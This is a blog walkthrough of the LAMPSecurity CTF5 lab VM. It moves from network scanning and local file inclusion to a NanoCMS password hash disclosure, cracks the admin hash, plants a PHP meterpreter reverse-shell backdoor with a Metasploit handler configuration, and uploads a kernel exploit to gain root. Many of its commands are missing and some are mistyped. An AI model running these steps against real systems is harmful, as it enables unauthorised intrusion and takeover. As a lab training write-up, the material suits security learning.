LAMP Security CTF5 Walk through

Hello readers, today we are going to solve another CTF challenge “LAMPSecurity CTF5” (download it from here //www.vulnhub.com/entry/lampsecurity-ctf5,84). This is a beginner level challenge. We will try to break the privilege and gain the root access. So let’s get started.

List of actions:

• Scan the network
• Enumerate HTTP service
• Scan the web application with Nikto for more information
• Identify the vulnerable CMS application
• Create PHP BackDoor using msfvenom
• Upload and execute the backdoor inside the target
• Get TTY shell access using python
• Exploit the target
• Gain the root privilege

Scan the network

At first discover the target with netdiscover tool

We have got our target - >  172.16.2.169

Now open the Kali machine and scan the target for open ports and running services using nmap.

Based on the above result we can see there are multiple services are running on different open ports(22,25,80,110,111,139,143,445,901,3306,37459)

Enumerate HTTP service

As we can see the HTTP service is running on this VM let’s start browse through it.

Browsed over 172.16.2.169 gives us a webpage with Phake Organization header and a navigation menu bar.

Scan the web application with Nikto for more information

From the above scan it shows us the application is vulnerable to LFI. So try to get the passwd file with the following input.

We have successfully got the passwd file content, which we can use later if required.

Identify the vulnerable CMS application

Clicking on the blog tab redirects it to the 172.16.2.169/~andy/

If we closely see at the bottom of the page it is powered by NanoCMS. Which is really a backdated CMS and there is no use of it because of security. We will try to get any vulnerability related to this CMS and exploit it.

After googling it, we got the below result

Let’s go to the site and understand the vulnerability

According to security focus NanoCMS is vulnerable to Password hash information Discloser Vulnerability on the below path.

/data/pagesdata.txt

Now try to append the path with the URL and see what we can get.

The above page disclose the admin password hash. We will try to crack the md5 hash on hashkiller.co.uk

Result

We have successfully cracked the hash, the password for the admin account is “shannon”.

Now click on Admin Login to get the login page of admin panel.

  Put the admin credentials on it and login to get inside the account.

Create PHP BackDoor using msfvenom

In the admin panel window we got the new page option lets click on it.

This page will allow us to add content into the website. Using this feature we will try to upload a backdoor and create a meterpreter session.

Execute the following msfvenom command and copy the backdoor starting from <?php to die(); and paste it inside the new page content

Give any name to Page Title (e.g: exploitable) and then click on Add Page button.

We have successfully added the backdoor and after visiting the web site we can see it on the Navigation window.

Now open the msfconsole and run the exploit

Msf5> Use exploit/multi/handler

Msf5> set payload php/meterpreter/reverse_tcp

Msf5> set lhost 172.16.2.155

Msf5> set lport 4444

Msf5> run

Now open the website and load the exploit

We have successfully created the meterpreter session.

Upload and execute the backdoor inside the target

Run sysinfo command to get the system version

The above result shows the server is running on linux 2.6.23.1-42 version. Using this info we will try to find out if there is any exploit exits to escalate the root privilege.

After multiple search we have got the below exploit to escalate the privilege for this version of linux.

Now download the exploit using wget command.

Compile the exploite using gcc compiler

Get TTY shell access using python

Now get back to the meterpreter session and navigate to /tmp folder

cd /t

Now upload the exploit from kali machine to the target using meterpreter session.

upload /root/exploit exploit

Now again navigate to shell

Execute python one liner script to get the Bash shell

We have successfully got the restricted bash shell. Now nefigate to /tmp and run the ls –l  commend to check the uploaded exploit.

Exploit the target

Now run the below command to exploit the target

Env - ./exploitt

Gain the root privilege

run the id command to verify the root user

Great!! We have got the root privilege successfully and accomplished the challenge. Please let me know if you have any doubt on the same article I will see you soon with another CTF. Happy Hacking!!